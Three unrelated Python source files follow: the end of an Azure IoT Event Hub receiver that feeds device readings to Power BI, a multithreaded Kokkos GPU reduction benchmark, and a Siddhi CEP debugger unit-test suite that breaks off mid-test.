self.consumerGroup = config['azureResource']['IoT-ConsumerGroupPowerBI']
self.webAppURL = config['appSetting']['webAppURL']
if (not self.webAppURL.endswith('/')):
self.webAppURL = self.webAppURL + '/'
self.rtMessageRoomId = config['appSetting']['rtMessageRoomId']
except:
raise
return
# Event Hub Configuration
def loadEventHubConfig(self):
try:
nameValue = UtilityHelper.connectStringToDictionary(self.eventHubConnectionString)
nameSpace = UtilityHelper.getSubstring(nameValue['Endpoint'], '//', '.')
user = nameValue['SharedAccessKeyName']
key = nameValue['SharedAccessKey']
ehConfig = EventHubConfig(nameSpace, self.eventHubName, user, key, consumer_group=self.consumerGroup)
except:
raise
return ehConfig
# CheckPoint Store Configuration
def loadStorageManager(self):
try:
storageManager = AzureStorageCheckpointLeaseManager(
storage_account_name=self.storageAccountName,
storage_account_key=self.storageAccountKey,
lease_container_name=self.storageContainer)
except:
raise
return storageManager
# Event Hub Optional Configuration
def loadEventHostOptions(self):
ehOptions = EPHOptions()
ehOptions.max_batch_size = 10
ehOptions.receive_timeout = 300
ehOptions.keep_alive_interval = 290 # We don't want the receiver to time out, so send a ping before it does.
ehOptions.release_pump_on_timeout = False
ehOptions.initial_offset_provider = '@latest' # Always read messages starting from the latest offset
ehOptions.debug_trace = False
return ehOptions
# Clear Storage Old Data
def clearStorageOldData(self):
blobService = BlockBlobService(
account_name=self.storageAccountName,
account_key=self.storageAccountKey,
endpoint_suffix=self.storageEndpointSuffix
)
try:
blobs = blobService.list_blobs(self.storageContainer)
for blob in blobs:
blobService.delete_blob(self.storageContainer, blob.name)
print('delete blob : ' + blob.name)
except:
print('blob was locked. Re-try after 30 seconds.')
time.sleep(30)
self.clearStorageOldData()
def run(self):
try:
print('Loading EventHub Config...')
ehConfig = self.loadEventHubConfig()
print('Loading Storage Manager...')
storageManager = self.loadStorageManager()
print('Clear Storage Old Data...')
self.clearStorageOldData()
print('Loading Event Host Options...')
ehOptions = self.loadEventHostOptions()
except Exception as ex:
print('Exception on loading config. Error:' + str(ex))
return
try:
# Event loop and host
print('Start Event Processor Host Loop...')
loop = asyncio.get_event_loop()
host = EventProcessorHost(
EventProcessor,
ehConfig,
storageManager,
ep_params=["param1","param2"],
eph_options=ehOptions,
loop=loop)
tasks = asyncio.gather(
host.open_async(),
noneStop(host))
loop.run_until_complete(tasks)
except Exception as ex:
# Canceling pending tasks and stopping the loop
print('Exception, leave loop. Error:' + str(ex))
for task in asyncio.Task.all_tasks():
task.cancel()
loop.run_forever()
tasks.exception()
finally:
loop.stop()
# Program start
# Load Device -> PushURL Mapping
_deviceMap = dict()
_pushData = dict()
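# Assumed layout of deviceMapping.json (inferred from the keys used below; the
# values shown are placeholders):
#   [{"deviceId": "device-01", "pushURL": "https://api.powerbi.com/..."}]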
with open('deviceMapping.json') as json_file:
deviceList = json.load(json_file)
for device in deviceList:
_deviceMap[device['deviceId']] = device['pushURL']
deviceData = dict()
deviceData['TEMP_Min'] = 50
deviceData['TEMP_Max'] = 125
deviceData['IRR_Min'] = 0
deviceData['IRR_Max'] = 100
deviceData['INV_Min'] = 0
deviceData['INV_Max'] = 10
_pushData[device['deviceId']] = deviceData
# Start Power BI Thread
powerBI = PowerBIHelper()
powerBI.start()
# Start Main Program Process
main = HotdataReceiverMain()
main.run()
|
multithread_kokkos.py
|
from threading import Thread
from parla.multiload import multiload_contexts
import time
if __name__ == '__main__':
m = 2
n_local = 1000000000
N = m * n_local
#Load and configure
#Sequential to avoid numpy bug
t = time.time()
for i in range(m):
multiload_contexts[i].load_stub_library("cuda")
multiload_contexts[i].load_stub_library("cudart")
with multiload_contexts[i]:
import numpy as np
import kokkos.gpu.core as kokkos
kokkos.start(i)
t = time.time() - t
print("Initialize time: ", t, flush=True)
t = time.time()
array = np.arange(1, N+1, dtype='float64')
result = np.zeros(m, dtype='float64')
t = time.time() - t
print("Initilize array time: ", t, flush=True)
def reduction(array, i):
print("ID: ", i, flush=True)
global n_local
start = (i)*n_local
end = (i+1)*n_local
with multiload_contexts[i]:
result[i] = kokkos.reduction(array[start:end], i)
print("Finish: ", i, flush=True)
t = time.time()
threads = []
for i in range(m):
y = Thread(target=reduction, args=(array, i))
threads.append(y)
t = time.time() - t
print("Initialize threads time: ", t, flush=True)
t = time.time()
for i in range(m):
threads[i].start()
for i in range(m):
threads[i].join()
t = time.time() - t
print("Reduction Time: ", t, flush=True)
t = time.time()
s = 0.0
for i in range(m):
s += result[i]
result = s
#result = np.sum(result)
t = time.time() - t
print("Sum Time: ", t, flush=True)
print("Final Result: ", result, (N*(N+1))/2, flush=True)
t = time.time()
for i in range(m):
with multiload_contexts[i]:
kokkos.end()
t = time.time() - t
print("Finalize Time: ", t, flush=True)
|
TestDebugger.py
|
#!/usr/bin/env python2.7
import unittest
import logging
logging.basicConfig(level=logging.INFO)
from datetime import datetime
import time
from time import sleep
from unittest.case import TestCase
from SiddhiCEP4.core.SiddhiManager import SiddhiManager
from SiddhiCEP4.core.debugger.SiddhiDebugger import SiddhiDebugger
from SiddhiCEP4.core.debugger.SiddhiDebuggerCallback import SiddhiDebuggerCallback
from SiddhiCEP4.core.stream.output.StreamCallback import StreamCallback
from Tests.Util.AtomicInt import AtomicInt
import threading
class TestDebugger(TestCase):
def setUp(self):
self.inEventCount = AtomicInt(0)
self.debugEventCount = AtomicInt(0)
def getCount(self, event):
count = 0
while event != None:
count += 1
event = event.getNext()
return count
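# getCount walks the linked chain of events via event.getNext() and returns how
# many events are chained together; the debug event counters in the tests below
# are advanced by this amount.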
def test_Debugger1(self):
logging.info("Siddi Debugger Test 1: Test next traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) #Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName,queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEqual("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at OUT")
elif count == 3:
_self_shaddow.assertEqual("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40],event.getOutputData(), "Incorrect debug event received at OUT")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, _self_shaddow.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger2(self):
logging.info("Siddi Debugger Test 2: Test next traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1') from cseEventStream#window.lengthBatch(3) select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertEquals(3, _self_shaddow.getCount(event),"Incorrect number of events received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(6, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger3(self):
logging.info("Siddi Debugger Test 3: Test next traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + "from cseEventStream#window.timeBatch(3 sec) " + "select symbol, price, volume " + "insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),"Incorrect debug event received at IN")
#next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(4)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger4(self):
logging.info("Siddi Debugger Test 4: Test next traversal in a query with time batch window where next call delays 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
_self_shaddow.assertEquals(1, len(events),"Cannot emit all three at one time")
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count != 1 and queryTerminal.name == SiddhiDebugger.QueryTerminal.IN.name:
sleep(1.1)
#next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger5(self):
logging.info("Siddi Debugger Test 5: Test play in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at OUT")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(2, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger6(self):
logging.info("Siddi Debugger Test 6: Test play traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.lengthBatch(3) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger7(self):
logging.info("Siddi Debugger Test 7: Test play traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);";
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(3 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(3.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger8(self):
logging.info("Siddi Debugger Test 8: Test play traversal in a query with time batch window where play call delays" + \
" 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
_self_shaddow.assertEquals(1, _self_shaddow.getCount(event),"Only one event can be emitted from the window")
if count != 1 and "query1IN" == queryName :
sleep(1)
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger9(self):
logging.info("Siddi Debugger Test 9: Test state traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.length(3) " + \
"select symbol, price, sum(volume) as volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
queryState = debugger.getQueryState(queryName)
logging.info(queryState)
streamEvent = None
# Order of the query state items is unpredictable
for (k,v) in queryState.items():
if k.startswith("AbstractStreamProcessor"):
streamEvent = v["ExpiredEventChunk"]
break
_self_shaddow.assertListEqual(streamEvent.getOutputData(),["WSO2", 50.0, None])
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger10(self):
logging.info("Siddi Debugger Test 10: Test next traversal in a query with two consequent streams")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if 1 <= count <= 4:
# First four events
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
else:
#Next four events
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received")
if (count == 1 or count == 5) :
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 2 or count == 6):
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name,"Incorrect break point")
elif (count == 3 or count == 7):
_self_shaddow.assertEquals("query2IN", queryName + queryTerminal.name,"Incorrect break point")
else:
_self_shaddow.assertEquals("query2OUT", queryName + queryTerminal.name, "Incorrect break point")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(8, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger11(self):
logging.info("Siddi Debugger Test 11: Modify events during debug mode")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if (count == 1 or count == 2):
#WSO2 in stream 1
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
else:
# IBM in stream 2
_self_shaddow.assertListEqual(["IBM", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
if count == 2:
#Modify the event at the end of the first stream
#TODO Improve the logic to use equal operator
event.setOutputData("IBM",0)
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
sleep(0.1)
self.assertEquals(1, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger12(self):
logging.info("Siddi Debugger Test 12: Test debugging two queries with concurrent input")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select * " + \
"insert into OutputStream1; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream2;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl1(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream1", OutputStreamCallbackImpl1())
class OutputStreamCallbackImpl2(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream2", OutputStreamCallbackImpl2())
cseEventStreamInputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
stockEventStreamInputHandler = siddhiAppRuntime.getInputHandler("stockEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.acquireBreakPoint("query2", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def __init__(self):
SiddhiDebuggerCallback.__init__(self)
self.queryOneResumed = AtomicInt(0)
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
_self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if ("query1IN" == queryName):
sleep(1)
self.queryOneResumed.set(1)
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received")
elif "query2IN" == queryName:
#If query2IN is reached, query1IN must have left that break point
